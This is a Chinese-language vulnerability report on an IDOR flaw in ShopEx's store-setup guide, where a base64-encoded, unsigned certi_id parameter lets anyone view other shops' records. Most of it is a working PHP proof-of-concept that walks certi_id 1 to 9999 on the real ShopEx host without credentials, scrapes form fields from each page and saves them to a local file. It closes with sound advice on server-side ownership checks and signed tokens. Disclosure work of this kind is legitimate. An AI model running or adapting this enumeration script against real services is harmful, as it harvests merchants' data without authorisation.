简要描述:
ShopEx 网店使用向导接口存在越权访问缺陷(IDOR):修改 refer 参数中的 certi_id 即可遍历所有使用 ShopEx 程序的网站。
详细说明:
问题出现在 ShopEx 网店使用向导页面(guide.ecos.shopex.cn)。
示例请求(refer 参数中间部分在原文中已省略):
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
refer 参数 base64 解码后为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
注意:base64 只是编码而非加密,该参数既无签名也未与登录会话绑定,任何人都可以自行构造并替换其中的 certi_id。
我们修改 certi_id 即可遍历所有使用了 ShopEx 程序的网站——服务端未校验请求者是否有权访问该 certi_id 对应的店铺。下面的 PoC 脚本不携带任何登录凭据,按顺序遍历 certi_id 并抓取向导页面中的表单字段:
<?php
// PoC driver: walks certi_id 1..9999 and dumps the guide page's form fields for
// each one. The sequential integer ID is what makes this enumeration trivial.
for ($i=1; $i < 10000; $i++) { // enumerate certi_id values
    ShowshopExD($i);
}
/**
 * Fetches the ShopEx store-setup guide page (step2.php) for one certi_id and
 * records the name/value pairs of every text input found on it.
 *
 * @param int|string $cid  certi_id to query; passed through intval() before use.
 * @return void  Matches are echoed to stdout and appended to c:/shopEx.txt.
 */
function ShowshopExD($cid) {
    $url='http://guide.ecos.shopex.cn/step2.php';
    // "refer" is plain base64-encoded JSON: no signature and no session binding,
    // so an arbitrary certi_id can be supplied here. This is the IDOR the report describes.
    $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
    // NOTE(review): $refer is appended without urlencode(); base64 output can
    // contain '+', '/' and '=', which are not query-string safe.
    $url = $url.'?refer='.$refer;
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
    curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
    // No timeout is configured, and a false return (transport failure) is not checked.
    $result = curl_exec($ch);
    // Re-encode the body from UTF-8 to GB2312 (presumably for a Chinese-locale
    // Windows console); the regexes below therefore run on GB2312 bytes.
    $result = mb_convert_encoding($result, "gb2312", "UTF-8");
    // A page is treated as a hit when it echoes our refer value back.
    // NOTE(review): strpos() is used as a boolean, so a match at offset 0 would
    // be treated as "not found"; the idiomatic check is `!== false`.
    if(strpos($result,$refer))
    {
        $fp = fopen("c:/shopEx.txt",'ab'); // append results to file; return value is not checked
        // Grab every <input type="text" .../> tag, then pull name= and value= out of each.
        preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
        foreach ($value[1] as $key) {
            preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
            echo $res[1][0].':'.$res[3][0]."\r\n";
            $col =$res[1][0].':'.$res[3][0]."\r\n";
            fwrite($fp, $col, strlen($col));
        }
        echo '--------------------------------'."\r\n";
        fclose($fp);
    }
    flush();
    curl_close($ch);
}
?>
漏洞证明:
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
refer 换成其他加密方式 —— 注:仅更换 refer 的编码或加密方式并不能根治该问题,攻击者仍可重放或猜测取值;根本修复是服务端校验 certi_id 与当前登录店铺的归属关系,并以带签名、不可猜测且有时效的 token 取代可预测的顺序 ID。